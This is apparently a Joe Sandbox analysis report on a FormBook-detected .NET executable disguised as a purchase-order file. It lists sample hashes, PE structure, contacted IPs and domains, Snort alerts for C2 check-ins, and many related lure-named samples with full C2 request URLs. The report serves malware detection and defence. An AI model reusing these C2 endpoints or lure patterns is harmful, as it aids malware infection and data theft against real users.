                                                                                          		13335CLOUDFLARENETUStrue
                                                                                          81.171.22.6
                                                                                          		www.jupiter-directory.infoNetherlands
                                                                                          		60781LEASEWEB-NL-AMS-01NetherlandsNLtrue
                                                                                          104.16.100.51
                                                                                          		shops.mycartpanda.comUnited States
                                                                                          		13335CLOUDFLARENETUStrue
                                                                                          156.226.250.150
                                                                                          		www.iguaym.comSeychelles
                                                                                          		136800XIAOZHIYUN1-AS-APICIDCNETWORKUStrue
                                                                                          104.21.27.132
                                                                                          		www.burntkeroseneblueheelers.comUnited States
                                                                                          		13335CLOUDFLARENETUStrue
                                                                                          34.102.136.180
                                                                                          		pieprop.comUnited States
                                                                                          		15169GOOGLEUSfalse
                                                                                          198.54.117.210
                                                                                          		parkingpage.namecheap.comUnited States
                                                                                          		22612NAMECHEAP-NETUSfalse
                                                                                          165.231.150.75
                                                                                          		www.tsreaur.comSeychelles
                                                                                          		58065PACKETEXCHANGESEtrue
                                                                                          38.143.25.232
                                                                                          		trustedhomebuying.comUnited States
                                                                                          		134520GIGSGIGSCLOUD-AS-APGigsGigsNetworkServicesHKtrue

                                                                                          General Information

                                                                                          Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                          Analysis ID:633628
                                                                                          Start date and time: 25/05/202200:34:332022-05-25 00:34:33 +02:00
                                                                                          Joe Sandbox Product:CloudBasic
                                                                                          Overall analysis duration:0h 15m 5s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Sample file name:PO-INQUIRY-VALE-SP-2022-60.exe
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                          Number of analysed new started processes analysed:14
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:1
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • HDC enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Detection:MAL
                                                                                          Classification:mal100.troj.evad.winEXE@7/1@22/17
                                                                                          EGA Information:
                                                                                          • Successful, ratio: 100%
                                                                                          HDC Information:
                                                                                          • Successful, ratio: 42.3% (good quality ratio 37.7%)
                                                                                          • Quality average: 73.1%
                                                                                          • Quality standard deviation: 32%
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 97%
                                                                                          • Number of executed functions: 75
                                                                                          • Number of non-executed functions: 126
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .exe
                                                                                          • Adjust boot time
                                                                                          • Enable AMSI
                                                                                          • Override analysis time to 240s for rundll32

                                                                                          Warnings

                                                                                          • Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, svchost.exe
                                                                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, ctldl.windowsupdate.com, arc.msn.com
                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                                                          Simulations

                                                                                          Behavior and APIs

                                                                                          TimeTypeDescription
                                                                                          00:35:54API Interceptor1x Sleep call for process: PO-INQUIRY-VALE-SP-2022-60.exe modified

                                                                                          Joe Sandbox View / Context

                                                                                          IPs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                          198.54.117.217EY_Document_Order459099.exeGet hashmaliciousBrowse
                                                                                          • www.your-accountpaqpal.com/o6qa/?hR-D=M8sG2LSkPf51LYnFMG6vRBfAdTz7U7CVF+k16GeGFksZLT4o/8zMl0dhjo+kJXPpGkJW&YdnLP=6lSxZn5p
                                                                                          Zahtjev je u prilogu.exeGet hashmaliciousBrowse
                                                                                          • www.cielotherepy.com/euv4/?hN9h2=Hv38QzLXhZo0&BPS8=HPV4Q5EPJeH3saw4EFBeN7zL1ZdIcL1Uj7IqLRyb3oQKdylxfekoquh9EgQgi5xt43aOxG+3qg==
                                                                                          Payment tt.exeGet hashmaliciousBrowse
                                                                                          • www.heycitadel.xyz/dahn/?e4L=JKd/CWHRWylSa/a9OAC4EBEO+woArIO1jAUVp15iVLX7uvZSqqvf3mR5J1nrmzNBNYNR&SpQL=FTcPDR
                                                                                          Payment Advice.exeGet hashmaliciousBrowse
                                                                                          • www.zapcashtx.com/eatw/?4hhxg=D/eyiQ7guSi8QCj+puc/DTEOpB+Kohr/a08OXjoR9c2tKYQzcRJaENsCrfcz3w/4uXDcbnjOmQ==&a8GtsR=5jpd
                                                                                          SecuriteInfo.com.Variant.Jaik.72878.8629.exeGet hashmaliciousBrowse
                                                                                          • www.marmolsystem.com/ud5f/?h8b=lBFPhNRpyFupF85p&4hfdd=0MSSJ9hWUruxhUd5+Gk+0zzhE8z5E1jXJWjoOk5RvnodPWI1RDVsWvwN7eIMGUN33jR+
                                                                                          ORDERS_S.EXEGet hashmaliciousBrowse
                                                                                          • www.firetax.net/oxsm/?6l-P=B1SsaucI0TQne0GZPuoFXGZUTfm8TJ9/EfhETu6kAcLN3x90W7LB3A25rAWj6J2VXZAVIQSxsQ==&z6thCN=YZIxBXSPOP04Mrdp
                                                                                          swift copy$48,400.exeGet hashmaliciousBrowse
                                                                                          • www.macroaggs.com/hq0b/?A2=SZXTmj8XisRBPZraVVHXUM9zZrPlUOfnGtTYtlT16bcYrW6XulFehvPKMPj1LzEr2LaY&rT6dz6=9ruD_bI
                                                                                          Purchase Order MRQ-5525.exeGet hashmaliciousBrowse
                                                                                          • www.medicaleducationbangladesh.com/j86w/?DByP=NReRvsvJRfGWlTK0vxyHeO9Y7SNAAXczgujBnihGKczK6Cn0FpBEGF9o5UKQ8wN/3IBk&i8=QDK4qpCpRPo8L
                                                                                          Revised PI.exeGet hashmaliciousBrowse
                                                                                          • www.xpressporn.com/3e9r/?rTkln=-ZSDaj5&6lu=FQdCPUjhXotQoJ4CKAJtfTWZByK+Ojq+iU8IovunNytQ5TMwAp07fKSIvzOQyT864mAt
                                                                                          PO-AO XIANG FZCO.exeGet hashmaliciousBrowse
                                                                                          • www.hereweegooz.xyz/fk84/?9rPH=o6AlKDF&1b04ZF=qGdTqMxNAL2/HPElJIp9giJwbo9vyT5OhSgpiUocuRQn9kWaMcNXSwvFHPVZhPBUiV+k
                                                                                          Nuevo orden 1.exeGet hashmaliciousBrowse
                                                                                          • www.quitmetrics.com/o27a/?1bGTnHZ=B9AnjoFFwB1K67a/mRoAnAO1C4I0KunN6giFpQ/Q15srtShsVDj7j4Ulnf7TcJh2vYFf&3f=XlET1rn8
                                                                                          INVOICE.exeGet hashmaliciousBrowse
                                                                                          • www.xpressporn.com/3e9r/?mN9XD=FQdCPUjhXotQoJ4CKAJtfTWZByK+Ojq+iU8IovunNytQ5TMwAp07fKSIvzO6tjM68kIt&d8w=9rLTovu0C45tCjuP
                                                                                          NSH TRADERS RFQ#2203-20825.xlsxGet hashmaliciousBrowse
                                                                                          • www.nameandlikenesslabs.com/r87g/?sR=dnu0&5jDhlzbX=jvUDN6yzpIiNM3tfQBAcdgdsp2o57Aq68xKs7ZsJ0vqW24EiN/brZLPsYyHyW7GZDzOtTQ==
                                                                                          jTxM5F7A5M.exeGet hashmaliciousBrowse
                                                                                          • www.thighter.com/g02e/?iH=UQ0bnkvOvTZ3VR0/AlbB4VijbBFMPd40tmJVBvWP7d1i+ED0nf+pEQuWHh5h8FtirHIF4hSw8Q==&vDKtC=3fmPexR86
                                                                                          exmTiNSfPQ.exeGet hashmaliciousBrowse
                                                                                          • www.xmasshoppinglist.com/n6g4/?1bEt7=lk1Ytgy8J/bvTt/WRqBsrOyQYj13WzRH28tozJjqHbm67axjfCQNJAM45Y+69Fdfclnr&e2J=JnxhjJF8et
                                                                                          SuCXRbGUkW03rwC.exeGet hashmaliciousBrowse
                                                                                          • www.nashvilleholdings.com/rmpc/?a8O=BZVXlV&YR-=afxHBdBz/5ylH/5wrTWGokUdFLOpRiwJkK5MZSkPKDhYu4pk7qqGhfC33Sr52ksFL3t8
                                                                                          C4IAMAXFkX.exeGet hashmaliciousBrowse
                                                                                          • www.heartwork.ink/ud5f/?j4vx2b=8pg0lFQ0qtDhG&2dCP3h=LUUnRG1bYE/6dCMglGocpmbw1lfoLarAU3OimHkQagHOIokiCvU/DN5QDe0tGqZSqCffsRbEXg==
                                                                                          PAYMENT COPY.exeGet hashmaliciousBrowse
                                                                                          • www.drtuba.one/ok4e/?l8=r2JtQFmxOX1&9r08n4=daLpqbgfIqMFwuZb445NBmKd4oH7hVOhampubeApTAXI428vNgc1+LhqwSXkKZ3P1wGW
                                                                                          oLSSEKvGiy.exeGet hashmaliciousBrowse
                                                                                          • www.cuevaleisure.com/wgau/?4h=6lgHbD&iTqDzzv=gnSYLApbQ95q5TQcUOiX7rQ04DjAYId2Ly0iLiuSePS42Aeuw+xDaa5m2Nx99kaZAURJ
                                                                                          SecuriteInfo.com.Scr.Malcodegdn30.31194.exeGet hashmaliciousBrowse
                                                                                          • www.shebreaksvegas.com/p89m/?k8eD=dxl3YgYyfKzBxJgP69QHjk5SqTxPEgyIajBDf3IEL75O4o/pjjMKPQ0TDTNgcRYPcaRs&cJ=EtVpuVJ8Czd8

                                                                                          Domains

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                          td-ccm-168-233.wixdns.nethttp://authcccu.comGet hashmaliciousBrowse
                                                                                          • 34.117.168.233
                                                                                          http://onlinecccu.comGet hashmaliciousBrowse
                                                                                          • 34.117.168.233
                                                                                          https://www.faxremittancereciept.com/Get hashmaliciousBrowse
                                                                                          • 34.117.168.233
                                                                                          Commercial Invoice_xlsx.exeGet hashmaliciousBrowse
                                                                                          • 34.117.168.233
                                                                                          Bill Of Lading-Original_xlsx.exeGet hashmaliciousBrowse
                                                                                          • 34.117.168.233
                                                                                          http://www.microsmandate.netGet hashmaliciousBrowse
                                                                                          • 34.117.168.233
                                                                                          Company Profile.exeGet hashmaliciousBrowse
                                                                                          • 34.117.168.233
                                                                                          triage_dropped_file.exeGet hashmaliciousBrowse
                                                                                          • 34.117.168.233
                                                                                          RFQ-Order List.exeGet hashmaliciousBrowse
                                                                                          • 34.117.168.233
                                                                                          shipment documents for SST2112-250..exeGet hashmaliciousBrowse
                                                                                          • 34.117.168.233
                                                                                          IFP_Instruction N. 1111.xlsxGet hashmaliciousBrowse
                                                                                          • 34.117.168.233
                                                                                          http://www.wilcosite.orgGet hashmaliciousBrowse
                                                                                          • 34.117.168.233
                                                                                          dj.exeGet hashmaliciousBrowse
                                                                                          • 34.117.168.233
                                                                                          https://www.minstroy.saratov.gov.ru/communication/blog/admin-blg/1.php?pagen=12Get hashmaliciousBrowse
                                                                                          • 34.117.168.233
                                                                                          PO8765.exeGet hashmaliciousBrowse
                                                                                          • 34.117.168.233
                                                                                          Statement of account.xlsxGet hashmaliciousBrowse
                                                                                          • 34.117.168.233
                                                                                          Payment receipts - All due Invoices.xlsxGet hashmaliciousBrowse
                                                                                          • 34.117.168.233
                                                                                          Payment receipts - All due Invoices.xlsxGet hashmaliciousBrowse
                                                                                          • 34.117.168.233
                                                                                          bqOzwqaUEQ.exeGet hashmaliciousBrowse
                                                                                          • 34.117.168.233
                                                                                          COl9lXc3d3.exeGet hashmaliciousBrowse
                                                                                          • 34.117.168.233
                                                                                          www.jupiter-directory.infoPurchase Order MRQ-5525.exeGet hashmaliciousBrowse
                                                                                          • 37.48.65.155

                                                                                          ASNs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                          NAMECHEAP-NETUSFedEx Shipping documents.exeGet hashmaliciousBrowse
                                                                                          • 198.187.30.47
                                                                                          2gl1wtChCW.exeGet hashmaliciousBrowse
                                                                                          • 199.192.29.215
                                                                                          DHL_29028263 documento de recibo de la compra,pdf.exeGet hashmaliciousBrowse
                                                                                          • 198.54.117.216
                                                                                          FACTURA DHL.exeGet hashmaliciousBrowse
                                                                                          • 198.187.30.47
                                                                                          http://authcccu.comGet hashmaliciousBrowse
                                                                                          • 199.188.201.38
                                                                                          http://onlinecccu.comGet hashmaliciousBrowse
                                                                                          • 199.188.201.38
                                                                                          PO#15032016-A001..xlsxGet hashmaliciousBrowse
                                                                                          • 198.54.117.210
                                                                                          Commercial Invoice_xlsx.exeGet hashmaliciousBrowse
                                                                                          • 198.54.117.211
                                                                                          GWD.exeGet hashmaliciousBrowse
                                                                                          • 162.213.255.237
                                                                                          PUCHASE ORDER.exeGet hashmaliciousBrowse
                                                                                          • 198.54.122.135
                                                                                          Quote Req. AN04565L (60683111) from ALBA.exeGet hashmaliciousBrowse
                                                                                          • 198.187.30.47
                                                                                          Sat#U0131n alma emri.exeGet hashmaliciousBrowse
                                                                                          • 198.54.117.210
                                                                                          EY_Document_Order459099.exeGet hashmaliciousBrowse
                                                                                          • 198.54.117.217
                                                                                          SecuriteInfo.com.Trojan.MSIL.AgentTesla.ETH.MTB.26771.exeGet hashmaliciousBrowse
                                                                                          • 198.187.30.47
                                                                                          Shipping Documents.exeGet hashmaliciousBrowse
                                                                                          • 198.187.30.47
                                                                                          FedEx Receipt_AWB#5305323204643.exeGet hashmaliciousBrowse
                                                                                          • 198.187.30.47
                                                                                          Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousBrowse
                                                                                          • 198.54.117.210
                                                                                          Zahtjev je u prilogu.exeGet hashmaliciousBrowse
                                                                                          • 198.54.117.217
                                                                                          CPfUbF38MW.exeGet hashmaliciousBrowse
                                                                                          • 199.192.29.215
                                                                                          Inquiry_List & Data sheet.exeGet hashmaliciousBrowse
                                                                                          • 198.187.30.47
                                                                                          NAMECHEAP-NETUSFedEx Shipping documents.exeGet hashmaliciousBrowse
                                                                                          • 198.187.30.47
                                                                                          2gl1wtChCW.exeGet hashmaliciousBrowse
                                                                                          • 199.192.29.215
                                                                                          DHL_29028263 documento de recibo de la compra,pdf.exeGet hashmaliciousBrowse
                                                                                          • 198.54.117.216
                                                                                          FACTURA DHL.exeGet hashmaliciousBrowse
                                                                                          • 198.187.30.47
                                                                                          http://authcccu.comGet hashmaliciousBrowse
                                                                                          • 199.188.201.38
                                                                                          http://onlinecccu.comGet hashmaliciousBrowse
                                                                                          • 199.188.201.38
                                                                                          PO#15032016-A001..xlsxGet hashmaliciousBrowse
                                                                                          • 198.54.117.210
                                                                                          Commercial Invoice_xlsx.exeGet hashmaliciousBrowse
                                                                                          • 198.54.117.211
                                                                                          GWD.exeGet hashmaliciousBrowse
                                                                                          • 162.213.255.237
                                                                                          PUCHASE ORDER.exeGet hashmaliciousBrowse
                                                                                          • 198.54.122.135
                                                                                          Quote Req. AN04565L (60683111) from ALBA.exeGet hashmaliciousBrowse
                                                                                          • 198.187.30.47
                                                                                          Sat#U0131n alma emri.exeGet hashmaliciousBrowse
                                                                                          • 198.54.117.210
                                                                                          EY_Document_Order459099.exeGet hashmaliciousBrowse
                                                                                          • 198.54.117.217
                                                                                          SecuriteInfo.com.Trojan.MSIL.AgentTesla.ETH.MTB.26771.exeGet hashmaliciousBrowse
                                                                                          • 198.187.30.47
                                                                                          Shipping Documents.exeGet hashmaliciousBrowse
                                                                                          • 198.187.30.47
                                                                                          FedEx Receipt_AWB#5305323204643.exeGet hashmaliciousBrowse
                                                                                          • 198.187.30.47
                                                                                          Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousBrowse
                                                                                          • 198.54.117.210
                                                                                          Zahtjev je u prilogu.exeGet hashmaliciousBrowse
                                                                                          • 198.54.117.217
                                                                                          CPfUbF38MW.exeGet hashmaliciousBrowse
                                                                                          • 199.192.29.215
                                                                                          Inquiry_List & Data sheet.exeGet hashmaliciousBrowse
                                                                                          • 198.187.30.47

                                                                                          JA3 Fingerprints

                                                                                          No context

                                                                                          Dropped Files

                                                                                          No context

                                                                                          Created / dropped Files

                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO-INQUIRY-VALE-SP-2022-60.exe.log

                                                                                          Download File
                                                                                          Process:C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1308
                                                                                          Entropy (8bit):5.345811588615766
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84FsXE8:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzu
                                                                                          MD5:2E016B886BDB8389D2DD0867BE55F87B
                                                                                          SHA1:25D28EF2ACBB41764571E06E11BF4C05DD0E2F8B
                                                                                          SHA-256:1D037CF00A8849E6866603297F85D3DABE09535E72EDD2636FB7D0F6C7DA3427
                                                                                          SHA-512:C100729153954328AA2A77EECB2A3CBD03CB7E8E23D736000F890B17AAA50BA87745E30FB9E2B0D61E16DCA45694C79B4CE09B9F4475220BEB38CAEA546CFC2A
                                                                                          Malicious:true
                                                                                          Reputation:high, very likely benign file
                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                                                          Static File Info

                                                                                          General

                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Entropy (8bit):7.95001008492212
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                                          File name:PO-INQUIRY-VALE-SP-2022-60.exe
                                                                                          File size:544768
                                                                                          MD5:86dd400e33efa12ea4cbac3d29000e41
                                                                                          SHA1:d2ca57eb8122a98cd03daf63532e9717f362f808
                                                                                          SHA256:6ccee842a4957d3410ae6163bb96a9b7739b3ffc3032dfeeb2a3c7b273ca5656
                                                                                          SHA512:1372d99cf209af5ef91acb517f21ba3fd9cb77ea7952c1975188bd91be06ccfa12c1ab8bc436c50ad6eff99c718304866bde771a1a069bb38d16ef8192bc5760
                                                                                          SSDEEP:12288:ZD305MvHEaTlg0pRQi6QSH2TlpBnDAlVvXH/diI:ZD308HEElg0pR+QSHirmZXH7
                                                                                          TLSH:33C4122037780FAFE9E85BF57415415003B6D0ABA8A0F3E04E9AD1F96D3170ACA91E73
                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."3.b..............0..D...........c... ........@.. ....................................@................................

                                                                                          File Icon

                                                                                          Icon Hash:00828e8e8686b000

                                                                                          Static PE Info

                                                                                          General

                                                                                          Entrypoint:0x4863c2
                                                                                          Entrypoint Section:.text
                                                                                          Digitally signed:false
                                                                                          Imagebase:0x400000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                          Time Stamp:0x628D3322 [Tue May 24 19:33:54 2022 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:v4.0.30319
                                                                                          OS Version Major:4
                                                                                          OS Version Minor:0
                                                                                          File Version Major:4
                                                                                          File Version Minor:0
                                                                                          Subsystem Version Major:4
                                                                                          Subsystem Version Minor:0
                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                          Entrypoint Preview

                                                                                          Instruction
                                                                                          jmp dword ptr [00402000h]
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al

                                                                                          Data Directories

                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x863700x4f.text
                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x880000x614.rsrc
                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x8a0000xc.reloc
                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                          Sections

                                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                          .text0x20000x843c80x84400False0.957808438681data7.95977634644IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                          .rsrc0x880000x6140x800False0.33056640625data3.47019410663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          .reloc0x8a0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                          Resources

                                                                                          NameRVASizeTypeLanguageCountry
                                                                                          RT_VERSION0x880900x384data
                                                                                          RT_MANIFEST0x884240x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                                          Imports

                                                                                          DLLImport
                                                                                          mscoree.dll_CorExeMain

                                                                                          Version Infos

                                                                                          DescriptionData
                                                                                          Translation0x0000 0x04b0
                                                                                          LegalCopyrightCopyright 2016
                                                                                          Assembly Version1.0.0.0
                                                                                          InternalNameCDSCollectionETWBCLProvi.exe
                                                                                          FileVersion1.0.0.0
                                                                                          CompanyName
                                                                                          LegalTrademarks
                                                                                          Comments
                                                                                          ProductNameBookShopDialogBoxes
                                                                                          ProductVersion1.0.0.0
                                                                                          FileDescriptionBookShopDialogBoxes
                                                                                          OriginalFilenameCDSCollectionETWBCLProvi.exe

                                                                                          Network Behavior

                                                                                          Snort IDS Alerts

                                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                          192.168.2.537.97.135.18849790802031449 05/25/22-00:37:20.692347TCP2031449ET TROJAN FormBook CnC Checkin (GET)4979080192.168.2.537.97.135.188
                                                                                          192.168.2.5217.160.0.20649817802031412 05/25/22-00:39:41.286145TCP2031412ET TROJAN FormBook CnC Checkin (GET)4981780192.168.2.5217.160.0.206
                                                                                          192.168.2.5217.160.0.20649817802031453 05/25/22-00:39:41.286145TCP2031453ET TROJAN FormBook CnC Checkin (GET)4981780192.168.2.5217.160.0.206
                                                                                          192.168.2.5156.226.250.15049796802031453 05/25/22-00:37:47.119066TCP2031453ET TROJAN FormBook CnC Checkin (GET)4979680192.168.2.5156.226.250.150
                                                                                          192.168.2.5156.226.250.15049796802031412 05/25/22-00:37:47.119066TCP2031412ET TROJAN FormBook CnC Checkin (GET)4979680192.168.2.5156.226.250.150
                                                                                          192.168.2.5198.54.117.21749813802031412 05/25/22-00:39:25.738101TCP2031412ET TROJAN FormBook CnC Checkin (GET)4981380192.168.2.5198.54.117.217
                                                                                          192.168.2.5198.54.117.21749813802031453 05/25/22-00:39:25.738101TCP2031453ET TROJAN FormBook CnC Checkin (GET)4981380192.168.2.5198.54.117.217
                                                                                          192.168.2.5172.67.219.1949815802031453 05/25/22-00:39:30.985747TCP2031453ET TROJAN FormBook CnC Checkin (GET)4981580192.168.2.5172.67.219.19
                                                                                          192.168.2.5209.141.38.7149797802031449 05/25/22-00:37:52.815294TCP2031449ET TROJAN FormBook CnC Checkin (GET)4979780192.168.2.5209.141.38.71
                                                                                          192.168.2.5165.231.150.7549795802031449 05/25/22-00:37:41.464118TCP2031449ET TROJAN FormBook CnC Checkin (GET)4979580192.168.2.5165.231.150.75
                                                                                          192.168.2.5172.67.219.1949815802031412 05/25/22-00:39:30.985747TCP2031412ET TROJAN FormBook CnC Checkin (GET)4981580192.168.2.5172.67.219.19
                                                                                          192.168.2.5104.21.27.13249811802031449 05/25/22-00:39:20.297081TCP2031449ET TROJAN FormBook CnC Checkin (GET)4981180192.168.2.5104.21.27.132
                                                                                          192.168.2.538.143.25.23249805802031412 05/25/22-00:38:29.606349TCP2031412ET TROJAN FormBook CnC Checkin (GET)4980580192.168.2.538.143.25.232
